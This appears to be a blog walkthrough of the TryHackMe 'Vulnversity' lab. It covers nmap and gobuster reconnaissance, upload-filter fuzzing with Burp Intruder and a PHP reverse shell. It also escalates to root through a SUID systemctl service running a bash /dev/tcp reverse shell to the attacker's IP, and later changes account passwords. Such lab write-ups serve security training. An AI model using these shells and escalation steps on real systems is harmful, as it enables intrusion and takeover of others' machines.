Linux Privilege Escalation – Walkthrough

Hello there, welcome to our walkthrough on the “Vulnversity” room from TryHackMe. Here is the link to the room: https://tryhackme.com/room/vulnversity. For this room one can opt to use the attack box which is straightforward, you could also opt to use OpenVPn, in case you are not familiar with how connect via OpenVPN, please visit https://tryhackme.com/room/openvpn.

What is expected of the Room?

The room falls under the basic computer exploitation classification on try Hack me. It’s a room meant to equip one with skills needed for active reconnaissance, performing basic web application attacks and most especially privilege escalation.

[Task 1] Machine Deployment

We will use this machine to perform our attacks for the given tasks.

.  .  .

[Task 2] Reconnaissance

We need to gather information on the attack machine, what is a better place begin than a Nmap scan on the specified box? (your machine IP being the one provided by the room)

(# 1) Run an Nmap scan with the arguments given above and count the number of open ports.

nmap -sV -T4 <machine ip> 

• -sV = runs a scan for service versions
• -T4= It is a timing argument

(# 2) Check the version of squid proxy running and submit your answer.

nmap -sV  <machine ip> 

(# 3) Running the -p-400 command simply tells Nmap how many ports it should scan. For more information on this, you can check the Nmap manual.

man nmap

(# 4) We can also use the same command as above to find out what -n tag does not resolve.

(# 5) From the earlier Nmap scan, we can simply identify the operating system, but we could also use the tag -O to get the operating system running.

(# 6)Ensure that you know what web servers are and the ones that are used in order to answer this question To get the port that the web server is running on, we can simply check the results for our first Nmap scan.

[Task 3] Locating directories using Go Buster

Now we are going to use go buster which is a directory discovery tool that will find hidden directories. Go buster is pre-installed in kali but in case it is not, you can installation by using the command sudo apt-get install gobuster or sudo apt install gobuster depending with your kali version. For kali, wordlists are normally located under /usr/share/ folder.

In order to list the directory with the upload form page we need to run the gobuster command listed below

gobuster dir -u http://<machine IP>:3333 -w <wordlist path>

In order to confirm if we have the right directory, we can load our folder path on the browser, the result should be as follows:

. . .

[Task 4] Compromising Web Server

Now that we have found the upload form, we can move to the next task which is to compromise the server

(#1 ) We are required to test which files extensions can be uploaded example .txt, .HTML, .md, .php and others to find the one that cannot be uploaded. This is called fuzzing.

(#2 ) Create a list with the file extensions given to in the room. This can be done in three easy steps:

Touch <file_name> – This creates the file

echo ‘<content> ‘> <file_name> -These writes to the file

cat <file_name> – This reads the file

We are going to use intruder to automate customized attacks. Go to the proxy tab on burp and make sure it is configured to intercept your browser traffic.

Intercept traffic from the form once you upload a file, right click and send it to intruder, click on payloads and select load, choose the file you saved your extensions.

Click the position tap find the filename and “Add §” to the extension as seen below.

Ensure that the attack type is snipper and click on start attack.

(#1 ) Now that we know which extension our payload can use, we are going to create a reverse shell.

• Download the reverse php shell here: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
• Edit the downloaded file i.e the ip to be the one provided in the link given (your tun0 ip) , and the port number if you wish it. In this case, we will just use the port number 1234
• Rename the file to <file_name>.phtml
• Listen to incoming connections using netcat with command nc -lvnp <your_port>
• Upload the shell and navigate to http://<ip>:3333/internal/uploads/<file_name>.phtml  that will execute your payload.
• you should see a shell on your netcat session

(# 2) To find who manages the server, we will list all users.

cat /etc/passwd

(# 3) In order to get the first flag, we need to go to the directory for the user bill.

• cd /home/bill -To get to bill’s folder
• ls – List files and folders under the user
• cat <file_name.txt> – Read the file to get flag

. . .

[Task 5] Privilege Escalation

Since we have the system user, we are now going to escalate our privileges in order to become the root user.

SUID is a file permission that allows a user to to run a file/program temporarily with the owners permission.

(# 1) We are expected to search for SUID files and see what stands out

find / -perm /4000 2> /dev/null

We realize there is a /bin/systemctl which is interesting not only because runs services but also because in this case it an be run by any user.

(# 2 )  So as to get the final flag, we need to escalate our privileges to become root. To do this, we are going to create a ‘.sevice file’ that when run will create a shell to the root.

• First off we need to create a file with the extension ‘.service’ eg file.service and copy the following to it. This code creates a service that activates a port which then allows us to listen in on the service thus creating a reverse shell

[Unit]
Description=root
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<your_tun0_ip>/4455 0>&1'
[Install]
WantedBy=multi-user.target

• Since we cannot copy this directly to our existing reverse shell we need to host it from our local machine by simply using  python3 -m http.sever <port_no> command.

• We then download it from the existing shell. If we try it out where we are presently which is /home/bill we will get an error so we will need to cd /tmp then download it from there. This is because /tmp folder stores temporary files and nobody really pays attention to it.

wget http://<ip_add>:<port>/<file_name>.service

• Once this runs successfully, we will then have to enable the service before we can run  it (p.s) if we run systemctl enable <file_name>.service  it will give us an error so we have to use.

systemctl enable /tmp/<file_name>.service

• We now need to create a listener using the same port number that we used inside the ‘.service’ file.

• Once the listener is up, we can then start the service.

Systemctl start <file_name>.service

• This will create a reverse shell on our listener as shown below.

Whoohoo!! We are now root, now we just need to find our second flag.

Cd to the home file and list all to see what is there. We need to read the root.txt file and sure enough it is our second flag.

. . .

What is hacking without having a bit of fun? Do you think we can change the password for the root user? There is only one way to find out go ahead and try it.

passwd

Hehe, that was relatively easy, now you try and change bills password. We hope you learnt something new and had fun doing it until next time adios!!